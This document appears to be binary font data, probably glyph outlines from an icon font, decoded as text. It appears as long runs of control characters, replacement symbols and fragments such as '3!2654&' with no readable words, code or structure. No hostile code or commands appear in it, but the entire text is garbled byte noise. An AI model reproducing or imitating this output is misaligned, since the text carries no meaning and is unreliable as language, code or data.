%/)%	%I��tVi��%67676'&'.'&'&67>'&'&#"32764'&'&672676'&'&'&#/&3'&'&'&.7676&'&'&'&64&'&#"7676'&'&"76?6762327>'&676767>	"2"P!+8
3+
j

		,"�3
			~!#(2"% ,
	C	

l
+4
9("	�	
3		� 6T6?
''��#!
	E8		6&,
!���
,'=7T6!		
9F	
"	�,&	!���j�Y$<&/.327676?67>&'"'.6?67>�1	)n68*���#!G$2'%!q�
����Bn6!X\&K&#.;y�0'*���$]b) r�&]\%�ABm8"8>8�/=x�g�S������+";2"76'+";276762'.=6'.547>;22546373263&5&5474/&'&=46;6376/&67>7676'54&"&'&754&2".4>676727327"'&'&?6?6' afd5c*
"
R# f, k	-
f".#	� 6 7?7!7M#

(
$��l
"� 	��
IW
#<
0aL

�E?	g
��

* (!'((� 7?6  8@5�!!A"
�	#����*[!"3!2654&.'&6?>?&/&+/5&'&'.>3#332727h�&&�''��.R8mJ	
45"
X'O;9H�
!1��2?F5'(�&�D''�&��K$W9>p $L+U9'?+
�$�
0%0n3�/�g-To����'&'&'&7>?67>'&>7676/&'&47676"&'.&'&'&'&767676?6767&7%>'."?67>'&'.&5&'."77%>?6&k;x&K1%
.�H"."
#:!K&P6,&~>40%$;xJ
#'!?#+'P-,��
$�&J���4NH�	
S��1+!-0=L
',"%%dg;84$",-.DI %$%%ge# 5�
E'�E&
	��
	
�#���i�S�����7674/&547>?62"675654'5&76767>76&54'&6327&'"&54'&>?>'&/'.76&'&'..67676'"%&/.7676/&'&7676?6/&6?6'&'�$$Jn<	O
6(!	,5*
Sw	


)�Mh1S)8+&U
UI%	$?''-0�A	/			\Z	>"Dw$$ 3*#=lH	
	L!(A 6*H5(	
	)7(N%
)!)&�k=0	3!"<F#tV'
7-!'U2	�I#%E((./
�.
		\f	 <"F�j�R]y�4767>'&''67676'&/73'#"7654/&7>7&/&'3276'&'&4/676'&2767>6/&/'767�&
		9�$#�0/i0I6R3;'?� )fT@ +]?��+B,!%K;C6#
R(�&5
)'2=J:B4\2(943?3EG#\E
�
�%/0:$GQk&K9V:
'	Ts%J&-(E#�f


T7"b�9.��	B+8+"	R)~	&6$	')
	 *�j�T����%'&54?6.'&7>3763676716&'676767676'&5&76'&/&'&'&.7>76'&7673!27327676'&'&.46'&'>76.>6'&/&'&'&'&'&4767>1767654767>'&/36'&'.>&''&'&75�
	

"I)		
*"	
'?L
)1-'XXCB	
R
	3/
	Z13
1�K
34r&6&*6$9>!
&G� %8'-76	"*1<"!
	


]
0<�!
�%$!$
	
(N+

	1S =Z"9-4
"dG0	_B#
001
#*:HMc;FD7:7$&6')n-6'$)6#��	%J	.		4$
6$)!.6 v7	#
�
(
		�jU[��.'&'&'&'&'&'&6676576.'.5476?>7>76'.'&'&&'&?>'&/4&'&'.'..7>'&76?!676?>7>&'"&7674'&'&'&'&'&'&"R	#,*	/&

		
*	


(	

%		
#$
'#���$%,5/%


&cN<	
jMaI4		$'	1*
)' 	s%! =%$	
1<
*			PAF
rr		"%&
ls	
!'4(2<&
�
?$'/%?""!)
	6*@/+	3
�j/R'/7?GOW_go!"3!2654&62#6&'&'6#6"'&'&'&'3'676262#6&'&'6#6"'&'&'&'3'6762���!!!!�0@��?@��@�@��@�@��@@��?�@��?R!��!!x!�1�4��.3�2��+�~�@&6Kb%"./2676=4"327>54&'.'7%6&'&#"7632267654'.'&>54&=46�p���p75�ε57��asiZWh,(	�'	�G	�		YliZWh�j})(�V
L
	W�()-+J
Hx'?%%?'	a,&$,,$&,W
`J,3�
�3+�
J{
/4YNKc
�4�

cKNY[PN0&E���3M|#"&=4&#!"+";;26=!;26=32654&%46;2+54&+"#"&5+"+"&=4&+"&=46;26=46;2;2��

�8
�%33%*�J�%33��
�

%
2$
�G<GG<G_�

�
3$�$33$�$3O

=


�uGG<GG����#7!"3!2654&#"'5#&473562346;2354&#!"3h�&&�''܁-��-���
�
M �� N9&�''�&����-��-�
,O!!O���48<%#'#7676767!&&'&'&33!676'&5%3'0jhC=F.F8F14))32E8F-���.4:'..'94.h4K
3BPXfWJ%;	K5$�j�@��DP@E1/%%/1E@PD�'.@@.'0E�?OH����
\?�E0�T
����>'''2?676767&.'&76767777676�P-brp+2p�$�`%3>g(ps,$S�>Y#"	,'!!%drqw*%:
'\B%�ʮ
27yids. C)!$*�	E9Qb
	
�ս_'�����Hr!"3!2654&#!"&5463!2!"3767>7>7>7>;54&"&/+"&/"/&/+3!26=#���"00"D"00
��

D
q�}n.	
,+�� 7	$#
x���0"�s"//"�"0�!		�

,�,y	G;
�XN7���;z	
�3.Z) ������.C2;2#!"'&'5&'&'.>!6276765>76&'.'&'n""
@6U�?�	�]N(	�u
76	@V��cV7	��
V*

�	gJ7
5�W	���r�J9IYiy������#";26=4&3#";26=4&!"3!'&6;2!2676&46;2+"&546;2+"&5+"&=46;25+"&=46;25+"&=46;2+"&=46;25+"&=46;27+"=4&+"&=46;26=46;2;2+"+"&=46;25+"&=46;2+"&=46;2�		F		��� 8%�#8 �@		@@		@�G
@		@

@		@

@		@
�	@		@		@		@	C.66.66s	@		@		@		@	�AA				Q"��"�""�"d"��		Y		�Z

�		Y		�

Z�		Y		��

Z�		Y		�66.66.�.

Z�		Y		��		Y		��#,_�%!"3!!"3!26=4&#!5!26=4&"&462!64/.54&#"/&>322?>=4&#"%'.??6&'&#'&&�0�������r0C//C0���%
�!

O	5+�}S=
O;�"A�5JJ5�"//D/0�m	�\
>$	F�%%�G
\2�	F7�����1-��'675654'&'&'7>&6??67>&'76&/6?676?"6?#6?476?65"37676767675'5/7"/.62���%

-	 0m0	,	
�Q��! (	�-	
O$

m
$O	DJJ88LJ<�*

)
�e�X�)�
(
2y2

(

�S� �

G'
y(H	
=RR>>TRB�%
&����j�R%2T&=467>54&+"3!2>#'.7>%!"&76=4&+"&46;2+"���	'�(
��	""�H���6�		�

�.�=	 ('	
F�v''.��?-	&x


p��	���(6�)Oq����5G\'&'&/&'&'&#43676=467>76767637676301>'"436?61>.636762"64'67>'&6?3'4/&="0"5'.676=4"#'&'&767654'53"'&'&767365'4#'&'&767>5'4&#"#'&'&76767632/&5.#""'&'&7676767'4'&'&#0156?676764&/&746&'&'&>76017>#&3276?6'&'&'"4?6;24/"'"'7676'"&367676&/063276##"327676/"276?6767630&/&'.#.'&'001673#.'&/&'&'&'"276767>763#'&'&'%6763237&'&'&'&'&'&'&#237676?6767632#'&/&%"'&'&316?67676?20'./&'&'&/674743%#"36/#"##&'&'&7676760''"'&3767>73'"'.'&'&�
 +-
	& $&").%�2
		

		
	

			


)	
	+			&
	
 
	

-)	

%��"#$4-"	
	
* " &a
!D%
&��
$-%),
		!
#
#	

�A
(

	



	
	V





&��
		


-				�	

	�	

	�L
	
				


			


1	
,'
F	
	

'$


	D


	-		!

 
3�


$
		P


/



m
	
	)X
"

	
w


(

	

b
		

���2?!"3!2654&+"+"&=4&+"&=46;26=46;2;2���''d&&�
�	

	�	

	�	

	�	

	�	

	�
2&��''%&��

	�

�	

�	

	�	

	�	

	�j�RRp�3!6'&?676767>'./.7676'&'&6?67623676?6&'&/&3637'&'"'&76&'&=6766'&76276�8o7

p 71@	�8	91?3'

 22
87.0ba
,W9Zb.^	
R!F	?4*6$!	!	>-/8

&3&2,nj��
/\	
'P
�


�h�V]��67676/&7676?+&'&'&'&'&'&?676767>767676'54;26<'43:6=&6+&6<+"+763"5&767676&'&'.F	)
.'5%

 7MO(4F#GN]:..�$
)	&

i29)4")	'G^;
;.#


(+<	"'+"L6FM		-:9@'
.>9(��


m
//"**"'-2���e%<S%&'&'&"&'&'&6767676##&"33754>;5#.'&'&'&/27B'T+�c5i6
RD+w���#C+	�	��S#
bQ
>a��:U~
	�|"B1c&	���`2`:S��	5j$(
�*
�jeR-8AJS\~�264&"";264&+"&=4&!26=4&#!"6..6.6'6.'6.64'&'76=4&"'&'&'&!;013;26=326�)*#		u		_�B���j/S2^S-EG_G�$4
2
	!!��2#�	:	�#2K(	`
	
J	zL&A "F@).Zk

'Bo

i@	
	��#2^
=
A		�2�j�R)R"&462&#".5467>.32676&&+"5754;264&+=4&+"3!2>�1D21F0�"�MJ|I73

>E.-LN[`�)	�� ���%$$-$ �#12D10�2	FTI|J?q'0�O[NL-.hW# [%%��%�"�j�S P�	&"3!2654&467732;26=46;26=4&+"&=4&+"+""#54&#!'.#54&"26=3>36=3265.��}5�}&.&��	����VHVVHV�

#
�O "$84b.8'0#
'��
,��&&-,��-����(UUGVUG�	}	���

]	
	]

	�� )Gw���2;7264&'.'&74'&'&72"&>#'"&/&+"3!2654&+"326=46;2;2+"+"&=4&+"&=46!"&=463!2'!"&=463!2'!"&=463!2^�$

#)&(�
�!��D

.

P��*
	-
	,		+	
-	
+

"��

q		��

q		��

q		�
na
	�%

�
�
*

*	
-	
,		,	
,	�!
		
b
		
b
		
������2CT%.'&'&767>&'&'&/.67676.7%>7>7>'.�.�4g(,0�;t/5&)�9r:
$M(&T)*R�Pa48_
Wr�^37_	�KSV	R]*'O��_	%QZ�#E#<&RH	@C�x%'@2-40'�
4J�	$(<1-g+
�jLR&*D[}�����#54&+"#"3!2>54.%2"&46!!!"&546;3!26=32.+";26=76.+"&=46;2/&";2?.+";26=76.+"&=46;2/&";2?&+";26=76.+"&=46;2"/&";2?#";264&#";264&#";264&ޅl�22�22��
v�j�+-! ,��
H
H!

II


	%I

I
!
II


	%
I

I
!
II

	%l�		�		�		�		�		�		2�822�21td�D�p!!p�8

P

+'
kP		
"[P

/'
oP	
"[
P
0'
pP	
"q				�	
		
	�	
	
	�v�BI%1"&'+6767!""&'&#"6;7>2763!2767>76?4.��<�)	�z44w����1[F=G,.2MA? 
�M
�/#
Fy&
�|
<	����z$A@*)D(F?2.3��c{  $2L&GxF��m�Q���&&+&'&'&7>?67767674&'&5676'&'&/6&'./.71&#"&'&&'&76?5>?>/&32767676?>>&7'.7>&/>�5:I6/	

&B<
J*/2
,
	#'


			&[bF+#	


'
(.$VP)R@,&+>,9>4�%	j%
	�">.@ N#8!$3 &
<
:?9
?8GYAD'


&
"=7L:	
	)@Rr;5
%


	<B�`P2<
+*?'5+#4>"=V#,T)AF9W			&�]9T�676767676?67475#"'.>3:676?6'&'.>'.'&754&'&'&'&54637676'&#&"64&�$;
g'e
C"f#
1'1Z
)'

#@e2D
�"
j
$�"	1Z.2#+!-
q",5/#	�x�?


#�#-E.4

	3220
C0U8_A'O/
!1�EX5j
��"#������&#&"#'.76327676'&#'#767676'&#&#'"#.76&'&'&#"737626.76763$76>&56546732676#"&463%"+&"&76'&63%2#.>�	1�1

�	83*(

q	;v|		
"	!"

&
)#


" !B
��	
8��D�D
P
	
�&%
e#'
	"#
&7oS&&$	((Q�
��

�-Z

/
�	
�jR(Rx���67626=4.+"!"3!2654&+"+"&=4+"=46;2=46;2;2>&'&'&#"=46;2767670&'&=4&%7>76&2764+"(B9u9B(*H*�*H*�0'<UY<'4%�&��%-. 75 .� Xe

S%>%%@%U����p��
+e'#:+@,+	:#�
�g�`,Db�����.DU^g%6767>36!67654'&/46763272+"&'&7676+236'&'.'".76763#"76367>?>23>.#6?67'654#257636#'"5>?5>=67675>5?67625?632'4766=&'&66=&'&26/46#"&5'&/&767>26'=272.'&74636%2'.7>2"&464>"&�$%��"0�K`a-2�[[#!/:F80	��#Hi


�N#��	�

	�!:)	
,

	r
++,0./!	
����3h4Z-@/(O�>�D-H
?/
B>(7
70J$
	

�$%'#�%&1
	8(O�6"(	p>2�#P
	JHkQ+�C$B N�r7	+%

3I�2+3"F3	$����,L[n776767>5&/%&7767>'.'&'&'&/767676=7676?4&#'6'2?>'.'&"67676?�s�_E�"5,�C��" *�\�pc!Sp]Q\=4/,M��lE5	�

�=qqu%�StcL}E
uI
_>-
�,
!l�*/@7.�?_*d+6D	/�',&,<127!<.8
T29�67%Y&0;*H�	(7
#6'3
�j{R(4@LXdpz��'.4626=4&#!"323!2654&4632"&5'432"&5'4632"&5'4632"&5'462"&5'4632"&5#!"&=!%32+"+"=4&+"&=4;26=46;2%!546?>=463!2rI
��
I
�
�abbabB	��
���55,44,#�zI
�
I
m	
�

�
m��

o(nnnnnnnnnnn�

��,44,44jHn

n�i�R)E#";2>5467>54&"&5462#"+"&54&+"&46;2g�!	56	"��

w	
�R"�55�"���\��




�h�X'�6?'	2764&'.767>&"/"/"/"/"/"&47'&4627'&4627'.627'&4627'&462762&"2T�N�K	SQ�d$
�S�.d$�(
5N5
5N5	5O5	5O5	5��		+
,N+	+N+	+O+	+O+	+
		
512  O�9�H�O&d-�P�%�SQ�2R3
2R3
2R3	2S2	2��

%)	)R)	)R)	)R)	)R)	)



3
���|�&56=4'.7676&.767>5'4673264&+&.63324+&&5&73264'&#""&>:64&+&74632>&+&&7>'.=4&>&`	<"(2
I 7:>}
-EbZ5M




!'	+*x!":N?#C��	#,7'�o
1Y?76
~8m�1F(S1W.

�

$�`

ZE��AA#(5.MH�gvTD&'.'.67676767626767>5476?676r
1'D��D'0	"	$"
/
"#		
	"	�# ##CB?UD
&'Djr9	)za.L&/.&K,a}*	&D>�+30"DU?�j�R(07?HPX`i|�����"&462!";265326532654&32#2?#7"#52?#"&/35"/35"#/35"#/35"#/&6;5#";#&=46;5#"#"&546;2?#2?+#5326?6&+5327+6=4&+532V7N77N7o�]g#4"^�VR	JI	Pf=FIFIKNP	RVV

=���
+�	E?<=��=
V�8"���'77N77����u���$_7)~		���$�)���
�j�R#!4&+"!"3!;265!26=4&���"�"��"","�",""�,""��"�"��"","�"�c�RAVjt�&'&'.'&"&676?&67676756'4'.67254'&'&"27676676765&'&/%6.;62+"&=46	
�^c#!+*m
�� �`35HLX
K+*GJ�IG*,+)GJ�IG*,��+~@n+x�3.	PW}E\#X-��(�R'
:LO��ojW

	DD �F:<#&!!��UIG*++)GI�IG*,+*GI�"~
(4�t4F
�kPCtdp��l�	�X'+/37;?232+&!"&543!!236'#%3#!#5335##5335#'3#����.\��/"��LA
��uua��iQQ>}}eMM�uuX�f�/�]RC,V���־��־���X�d*&'&7>76'&676.76&'V`���"!!"����"!!"�Q7HE�@�5&7HE�@�&�`"!!"����"!!"���7&�5@�EI�\7&�@�EH�g!\;AF&'&5'&?64/.67676=4'&76'6?&'6?'R$H6Ld3#f+#-��G#!
�))!B1=&2H#2!m\%G6)Le2
f%-��$
G$
	�$	�()!B1]&1H$��2!n
���j�R'0<JS_hq476762"'&'&2>'.46"&"&>22'&5&6#"&74>3.>"&4672>2"&.>�))DG�GD))))DF�GE')14U/6T.*E)+C*6 .3@-2��#--!'/�'.' ,	 3.@2-��!3+'+�-E0/F.��,B+,A,_RGE()*(EG�FD)))(DG��5Y6.S0�%,/&",.��-?4-?3r*B*!+�'. ',x3@,4@+��2@-',0 ,,A,+�$..F./�j�RSo���������D'.56'&/4&+&'&+'&5&#*"272#&+'"'&'&'&76767273454'&'&#&"#"6'"#";267676'5&747"#"375'&'&'27276765&'&'&#3%'362676767'4'&'&'&'&#&264&"264&"&'&'&'476765467626=4626=463256454>�&oW|

T
@
1/
oVt)=�CQ?	�)*	*�01 -?
P	-V=9P 
�RW-
#�0X
!]��
'!$		
	#R
D`�PR75�=i4G`�ti�D!�HH	%		�VX	0�.;�Y-
L,=(*#		2#!4>�4YC9�?\3:�#YZ5'p2�	
ZC	Y
!	

1	!,YY05
�j�T2BZq������4&.'5&76&#'"'.'&76&'&3!26546;2+"&5#&"&56'54637372'&#&&76'46376236#&#&"&56'4646372'&#&&56#&"&76'4673764636+&&76#&"=46;72'&#&"&=6'46;2>76'56'.%676'56'.�(&"?@$	pq !% "
&(%(�)$�	
�

�
�	
OP

$6$	#3"
NO
>PO		$6#
		PP	
$5!
�MN
	#4!
"	
�
	
m!
�RS

l$
	#5$
	�
��#"3'(�''6%$�%&	&&$&! 
L$$!&&''�(%%(<
CD

�p	
9+
@t
@?
=>
q	+9
BB
�		�	
?��
	??


=�		@A


?�+�

3
,:	?>	�%"% =;!&
%&20&�jTU7'&'&'&'&'&'&'&7676767676?6�%>8)39$.
A3&1#	"^"
R(
"�5O:]ePd[1$.'G	v[�m

	z= 
	����/=SZhu��"#"&5463!2#"#&3>'.'&7676'&4.#"2>232676'.#&"3%#6762.54>4."2>'&'6'&>���1??33>>0��	$+<#4h
+c	 =j>An??k~l?�##DE�ϩ77y,L+)I]K,,L�7@8! 6A7!J-!+=S^
	
>1�4??2�&0=<2(j�!��	��?l@>kl@?l8
	���-LXI,+L.,K,�!7!7B7!7b5#"T
	��*:JZjz��������
*:J%"264&!"264&!'#";3!2676&46;2+"&5'46;2+"&5'46;2+"&5'46;2+"&5'46;2+"&5"&=46;2##"&=46;2+"&=46;27"&=46;2#+"&=46;27"&=46;2#+"&=46;27"&=46;2#+"&=46;27"&=46;2#+"&=46;27+"&=46;27+"&=46;2�''8''B''8''��$2�l�
�
���





[



[



Z
		
[
		
B

	.	

	;	

	

	F	

	

	F





	F






F





.





,





�'8''8''8''8'�O
��	

8	
V














X

C

>

C

>

C


>

C


>


C


W


S


�j�R $(,<#"!"3!2654&#535#53#535#53#535#537#!"&5463!2�6�� -.\ -��\\\\�\\\\�[[[[��9R9. �..t�j\-\�\-\�\-\bm�����)J>7>&'.'.6767'&'&&/676'&'&'&'.76ON<*>d35'/S.&{>B,2U0<.'Z#6�f$,66i
"@!
+";	#[V4$3A-?ADHI54R@9'!%)@
 (KQ90&VZ&(.��.S#):6	.7E,2'! -A�����)'&'&6?56&ښ
�]��
_
|�
�|
���
���
�1�j�R!=]&#&##!"&=#;$267&'&'&'.?6276?62%7373675.'.#'&'##"q
&M�is#�1�"�#Fjb1
a_/$	�q��
	## 08!���#� 
��#Fk^.

Y^0$


�Z( -.���$W&67676&'&'&6767>&'&&'&?676./4'56567676?�

Yj)1K�qN+%'9~bW��)$Zj'5y#"/6j<z$�<O)C�;�Λ/qzI	<�3D
$u[Cy2L�qO+86l),(`U��'&3d:
%6tC75j=z
�<Q'C5[Q<�З-*W@+N9�1�j�S)A" 7676'&'&"'&'&47676254&+"2?64'�tqCDDCqttqCDDCqt�ZLK,--,KL�MK,--,KM""�0RDCqt��tqCDDCqttqCD��-,KL�LK,--,KL�LK,-x�##��1�j�R#%'764/&"'&"2?2?64���7��7����7��7�h��7����7��7����7�j�R1GWh��6?6&'&'&&'&'767>'&/./&7>3!2+"'23276."#&+"33254'&#!"3:54'&#!"36&'&'&'&7>766767>#"&5
'$+Z3(GMFC*
' G
$)r"+,%Z�]\
	d2����
�b2	��/nW]�1=,,:)

8 Mj	&"B&
6�PLV]�'-�)(T C"*$&FCOD&2`%"/&��	&)�	X���8��QO[5
)	N>(

P%\A&	0!8W=F/-&�j�S9bt���#!"&'&5&767676763!23!27>54&#!#232763267654&'.752#!&'&"#"&'4;72##"746332#32#!"&'&63""&5463!2#�:1	�s1I
/W%=$��'�	&�� +W��% %@6.]��J(�XY
v�N	


��
v�
��

��

�t:

`���2J;0�!C>

$=%b�1'%6',&��$	:%6(J���&!>/
d

4
�
	0���2;DM"'6...#"32767732>4."&462"&462"&462+&DR�4E��E4�TE'3W33W36��
53W33W�_%44J44""2##%33J44v3 H% �� %H ��x3VfW3�3VhV2��4J33J4"2##2"��4J33J4�jkT/EYy"+&3!2>766.'&'&/&6767'"56'5#56'47>7&'&7>76767667>'&%'&'&6 ��g�E')+�+�


�
*	/	�"
,	+��)Ff3���,.22�=&���
�Q# ��
[��6lQ8p08-[CDZ-����
"�!C�','
7<V	���%BOX4.'$;26=$;26=4'6'&'5#!5#3!26=4&".4>2"264&�)F)����)$#)
�

�
O�
$G��H�"$9#"�?-L--L[L--L.%44J55{(99(vl&&s

{��9�nn�80�$$�0�-MZM--MZM-4J44J4���i�T6BSY67>76?667?6767667#'&'&/%&'.'&'67676&'6?8
�5�k//L&�
��#;wj

�G ?#9r�

:n�` �5�k
��
���
#
��0
> I#9r	��7�j�R7F#"&'#"&7>323327676&#"3267#"7632276?&'#&#"���+? #,PU�\C&*,<$$	���`_		��/\&%l7��		����=99tt�2+.�f����.#:7Z��nl���Y�����@B*�d�j�S0;K['#&!"3!2>5#!"&546;#";3!'"&=4?!"3!26=4&%3!26=4&#!"���Y"8""9!_!9"h0"�"11"��)��f��,��fT�!9"�!9""9!R��"11"g"1�&	Z�
�%%�%%�i�R+<J32#!"&56'#!"&'&'&6?676767&'&'&.63!25463!2"(��2(!��)
��#&&�}	�p	V&	dv�R&jfl��x	vUn
�)�
�������l�S 5?Nat/&'.676".'&767627>.6.6767''.?67>&'&'&7676� 

#+>*Ez;$	30
 *1J)��H;!H�RGo8mc"V(('*�$
.;	
1�

%U*
�  
&*Dw>&`U4U��%<TF�UJl
6nb$�+:%(7*�"$�3>
�
, 	�
';%#'&#&'.'7%'732767676'&'&'"567622.>P()�#j�	~~5���
5&CK�
g�&+T)*	/�M
,&��.%!767>3%23!2!"'.'43Y�1=
623�U$
�"��\0	n1��R$.H$N!��1������0]gpz�'&'&'.'"'.'&'&'&>7637276#*73>76563623>.'&#54..>'>&"3>."'2>&"�];V
GH
<O(!-	2c=JGnI#zq88��"$��"- !. �-##-  #",!2!"-!"˗_L5<+!TG-
:?';(HlC�=pJ	'BA j#	# 2@ ! !�""-!�""-!#!," -"�j�RM%#".5467532767'#'&'&+5326=4&+5>54."3!;26=4&GoD<e;B8Fo /-MP\cTQ*$@z	���(45>6
&z
Zl=L;e<@i�`ADL\PM-/64VCl��

�?* 56-�C�


�����A"#&'.76'54676?62#&'&'&'&"&'&6?6?676�2dd'$&T�b
	��'F,�	˩
`�[ 8Z�V.
	}�D
 EK(>|
,Y5eU�,F)�i^4d1"&0\-
A�$'+���j�R(0456'&63%2#$"'&76'!3%>56!,3��3+,3���4Z�3%
//)�2,�r��_&L�`3//4�o�n4.3e����~$'�\q?L�[�j�R#,5>G"264&"264&"264&4&"2664&"2264&"264&"64&2�%66K55&%66K55s%66K55�5L56K5�5L55L�W5L55L(5L55L�$6K55LR5K66K5��5K66K5�5K66K5[&55K66L55L5�YL55L5L55L5�L65L5�j�S/7.'&"3!2>=4."&=.54>2>2N>@�@>N-H):a:�:a:)H��*'!8B8!'�-HTH-�_�-..-�_<U1�:a::a:�1U<��D,??,D;$!9!!9!$;g9^66^9����,P#"&=46;5&&'&#"1676767&5#54&+"#";;26=326=4&�e""e.01)-!5197b"8!JD33D86�G��G
�T"p"]!7?!6/3?D8/,/+'(('+$��H��H������*7'7'&#"167676767676'.T`���l�<GDx#&*#E)]T&?""?&T])E#*($~EI�[�\��rW�%C;?NUF:7!;502205;!7:FUP@<A����+;546;.#"&'&'"167676767#"&%!"3!26=4&$�g:=48#"84<:g $;#NH 55 HQ$<�$���

i
�u%2:#CC" 925CH;1/1.****-414%�
K

K
������'&'&#&567676767676'."�)B<GDz#&*#E*\T&?""?&T\*E#*&#zDG<BUN)&C;@NUF:7!:611116:!7:FUN@;C&)���,O[�%&'&'.5".4>2&'.'&'&7>7&'7&547467673676?7&'&''7'7676'&'D�|#5K�	bn@�I{II{�?<$$H=>{P 	*D+3O)H`&>r�_���
mC0H$C/
 ��

�$
	�		&��QFIz�|I%$=@�z#$#.+'.>'Y		*O2BD`C

�UIZ-%��	0Cm

-0.m	����3#%".5676?67%2362'&'.5&636�(F,����-G(�g�EC C�R+V� .\�\)-	�x *2��
-)\����-G)(H-G6-=
;$&�-)

�[d(/���;!";!2>54.|��33�"22;2�-2��2�2�j�S!.;DQ^" 7676'&'&2".4>>..>462"&.>.>�tqCDDCqttqCDDCqt�";"";D;"";��7D>(7D?(JB@.4BA.(8((8(0D<&:D<&%"@+
4D?,
4RDCqt��tqCDDCqttqCD`";D;"";D;"��(7D?'7D�W4B@.4BA6((8''��:D<&:D<4D@+
4D@+�j#R,9%"2>4.!"3!2654&463!2#!"&5".4>2�22<22��Q$33$�$33�+\���>i==i|i>>i�2;22;2^3$��$33$:$3n����=i|i>>i|i=�j�S39N^l&'&/&'&'&'&'.'&'&#&>76&545466'0&"&7>?6'&7>722"&76?6�$,0B	
Ԯ:<D9�~,>	
�T��
d?
	ZB
H&
8�

%217�
$ 
	���e�.=:k1+@���?
z-Eo
�~<Z[�
%:
2	��
-,3��#>Z"&/&'&'&547>767>'%'&'&'56'46;27>&'.6?6&'U
�@	mf	
��

"�~ 0~0!~!0~0 �)/�Fc4[uVI9rr/

"9L%c0  0~0  1�m�P3Lbo������&'&7676'&7>6767>&'&'&'&'&'&7676&'&67676'&7>67>67>'&'&%.7676'&7>#&"'&/76?#76746363'6746;�#&EMA�5"�#&EMA�4#

*,	0?

^~k)
9)t
A�I$
��H
!
""JH0	&	A/Jf��w*V4�Zn7;w
j6	
��QQVGMa�3B7>BPQWGO_�5@8>BE!#8y.	

/k|�a��n
=E�{
AZ3�z"	C�B1IjJ
 %YY%
MlnJ,(1]EJ��,
�$4+	${."!������,&'&"&'&"376776767>�؏'B*�w'B)(="u�(="Sf=y0��b3/DDP3/(3=49A!7U/P�Z9*/9J-[$Q�j�R#3CS!"3!2>54.#!"&5463!2!"3!26=4&'!"3!26=4&!"3!26=4&$��"9!!9"_!9""9
0"�"11"�"0w�f��f��f�R"8"�"8""9!�!9"��"00"h"11"�&&�&&��&&���3*#54.#!"#"3!2>54.'!5463!2|G2�W3F2222�T @ 4�22�2�.22�3ZYf  �f2?!"&/&'&'&#"327676?>;53#35335335#5354&".4>2�%!<f;;f<!%v{]M5N,R]��43>34�<fxf;3�];;]�3n�3=33=3�a�[&&>5#654&4&'&>5;9g=7.9f>7!7.9g=7.9g=GU<��v�O0HU<Nv�0Hx0HU<�P0HU<�i�S#!"3!2>54.#!"&5463!2u��5555�*��**"*R5��555�{**"**�gtR4'&547>2.5&765w9[6�'AB�`�t-T7
h$IS)E6@F%��1o1tFePAsJ-YP(�j�SD" 7676'&'&54&+".'326=4&+>7;26=#";�tqCDDCqttqCDDCqt9Xd����eXe����RDCqt��tqCDDCqttqCD�����dXd����eXe��j�R'7"'.5476752767654'.32654&+"�/LAB�B@L/Io;9ad�ea9; o��
"//"
!//��(79@M�&''&�M@97(�#uKMUuea9;;9aeuTNKu��0!H"//"��!0�j�R&14'./#&#1"13127676765��{TWi_\�#!#\>MOXsgdF6^-.��-*(�^XZJHw\<$%20VBOSX������*#47654.6'.2676'267654'&�(="u�(=!��0/ϗ'C)�w'B)W9A!7U/P�[8*/\�$Q#�f3/DDP3/(3=4�����*N%#"&=#"&=46;'&"?626'#54&+"#";;26=326=4&�)v))?im���
;
�
"
�
܅A��A�B)�)�(�

�
	�	!��
��

��A��A���|�=.G"/#&'&?4/.>?26?>23762'&6?'./��	�6	7�#�f
#,$
e�#�7	��y#�F�#y�9AA9�
��%��*)��)*��%lC�SS�Cl)��)�����+;%&6?#"&=46;&5'&"?626'!"3!26=4&�

�&&5mm��

�

;
� ��U

�
�
	&y%��
	�	
��
	��	

N

N���~�;'62'%&"&76&/&67%>7�w'�@
�
&
�@�',���
%��
��"%
��i�U)?H'&'&'.'&7676'&'.'&>76&/&'.7676'&'�I^0#&_FK�@

V:	

P!	+<A"i2W"��|Tt�8A!,A


AEe�2O9@
��:,1#
-1l'
�\@w�(��463!2#!"&5��p�����X�^(%'.'&767676.76767'�?WTSW~?6IF�?l�Zda�qvW`"!!"���`G'�t?~WTSW?6(mZ�cH'#%W`���"!!"`G^)2�]�_147367676/.#&'7%77676767�!%6HE�?k�-*ca�puW@%$9 &6HE�?i�a;ca�puW@%#dHE1#6'kW��cH'#$WAROW0KA.&6'jX���cH'#$W@ROW�j�R 0@!"3!2>54.".4>234'&'&+5323&'&'&'532{��2222�E00:1>�31TVd�ok?A�ZW�������:<R2��222��1:00,>dVS12h@?kn����VYw;:ш���i�R)%'654'&'&"327?6&%".4>2��+64Z\�\Z4664Z\k\V�.u��AoAAo�oAAo=�V\k\Z4664Z\�\Z46+�u.�Ao�oAAo�oA�h�Wu����w���%&'&'.7676'&'&'.?6'&'&'"'&/./&'&76767>767>'&'&67656".4>2&>&"&462&5&>7676&/&6763276'&#"&7676'&'&'.'54'&'&'&#"73267676'&>&7>..>&'.?6'&'&&?6'&#"/&#/&7632?6367676'4'&676'4.>'">..>
)(", 	'1*,:'	8,"	')
+#
,0	%*$/!
B,%,�t1Q02RaQ/0R/#42G43$ �




	
(		
	
	
	

�DH"DH.
#"#
	�
	

			
	S 

�X5&
 +#

()
$(?(/W,&4%
	

-@
.:^1SaQ/0RbQ0	2G33F4~"!	
,	 	(	


	+
)	


�"H"DH!s#!
$ B�
				




  7

���[�MFSo�&'.7>72>&'.'&'&67>676?>'&76'&'"2>4.>76&'.'&/&&7>'#"&'&?6�#0=�25$rGJ<9�F-ys>
*#Z](
5G
6)PJ!
IO!

7#�*H*)HUI+*I�#?3+80'/
)��>,A !�.,0�@CQ)(ADIH%41l~,$'2+O=?)&N(	6:�*GUI+*HUI*�H4,

#,Z		�	B2	""	���i�X 0	./&2764&462""'&4?62�QV"�"VP/6�I��6M87M��
$
��

�$

�5-QU"�#V�UJ,M76N6���


$
�

��
$���;&6F!";!2>54.#!"&=463!25#!"&=463!25#!"&=463!2|��22�"22B	�T	

	�		�T	

	�		�T	

	�	;2�-2��2�2�	

		

						

		

	���;(1!";!2>54."&4623"&4623"&462|��33�"22�O&66L77�&66L77�&77L66;2�-2��2�2�H6L77L66L77L66L77L6�����-&BKc���5676?67>'&>76'&&&'&/&'&767>&&'&/&'&67676276?6764'&/&.76?>'7>&'g%&		
F
�h
**3@$.S**49\
�'K9	
�e-W
C�C

TQ$rv'M.p($-
/(M<gK$K;2	
"
�
 +)
WN
3(-@8#�e6&g1;=
	�%M9
�-0"C�B

QTvr$%N.�,		-&#	1&O<
